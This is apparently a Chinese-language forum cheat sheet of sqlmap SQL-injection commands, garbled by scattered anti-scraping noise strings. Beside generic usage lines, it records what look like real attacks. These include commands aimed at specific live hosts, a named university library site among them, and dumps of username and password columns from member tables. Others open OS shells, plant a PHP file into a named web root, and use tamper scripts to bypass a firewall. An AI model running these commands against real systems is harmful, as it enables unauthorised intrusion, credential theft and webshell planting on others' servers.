sqlmap使用实例

admin

/pentest/database/sqlmap

# `9 z4 W+ ]( z3 Y5 z* supdate :::::>     in the folder   after  execute    following   order : svn update
2 }6 |8 k  S1 |7 I& J
7 a) E6 j) x( a5 D( R; isqlmap.py -r 1.txt --current-db
  `# J; E4 K& h9 Y0 m
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
2 B% a% M: Q! s
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
0 K9 m& }' i0 {0 e* I猜解数据库
! g' j  D, d: i% r2 L& W: A: h+ i8 b./sqlmap.py -u "injection-url" --dbs
- W5 w( M5 J' T$ B% Ysqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"

猜解表名
./sqlmap.py -u "injection-url" -D database_name --tables
: [- W9 i3 S/ T! E0 j, M
8 H8 q; \# ^/ P) B/ f6 n* xsqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
4 z5 B8 x4 c8 o9 g) s9 nsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
3 u2 h* z( o# o6 W' H7 ^
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump

sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
) {7 _; E, d: q+ T6 usqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
% s+ z  `+ t/ f" h/ J- Qsqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
  |+ I" U+ {( s7 F2 l
" d0 M6 F& I% B* k) }sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
- e/ A( a/ w# Usqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
* _6 m3 H3 t) nsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump

* @9 I. s; O9 W; |9 fsqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
' N/ f. X* t( B; Q& v  \" Q; zsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"

sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
猜解列名
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
/ n( K+ @8 H6 Q( h5 u
8 e7 M# h9 Z/ Tsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
4 }( ^. y: J0 _' r  i( ^2 fsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
3 @; A9 D+ i5 @4 `: \9 m1 A) B5 Ssqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"

sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
2 {% I. J6 Y5 Z7 p7 U% h&submit=Go
猜解值
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
========================================================
搜索表名中包括mana字符的
/sqlmap.py -u "injection-url" -T mana --search
  W+ ]" I+ G5 |3 M8 }返回一个交互式sql shell
& }* @9 M$ @$ M2 i+ ]: x8 X/sqlmap.py -u "injection-url" --sql-shell
读取指定文件（需权限）
! b8 e% x4 _4 P! G0 D7 X/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
! Q2 ]- ~* q+ g# ^# i/ _+ A查看当前 用户 及 数据库
/sqlmap.py -u "injection-url" --current-user --current-db
. l6 s; x6 z9 Z. T- x本地文件 写入 远程目标绝对路径
! P1 u3 R, o+ x/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"

+ d6 @9 Y/ f# u( _1 a" v  H; lsqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
% @2 Z, M$ L. |( ?6 ~# F- g查看某用的权限
/sqlmap.py -u "injection-url" --privileges -U root
查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
读取所有数据库用户或指定数据库用户的密码
sqlmap.py -r 1.txt --users --passwords
- j5 J( l0 I5 y- K0 ~sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
3 j5 Q; ^2 X; b: \$ ^" a9 a8 m4 O
8 d. \2 O* t+ [( X+ R- S/sqlmap.py -u "injection-url" --passwords -U root
5 P& c+ h% \, ^0 ~8 S" A$ w' y7 T
2 ]' j. t# l6 V  g% N--start&&--stop 与 --first&&--last 的区别
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）

从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
% |# h$ P# V; r/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
9 [/ k; r8 V/ ]# N: `* N/ h
执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"

; R" T6 M! i0 V: E1 d2 W1 O# u' [9 b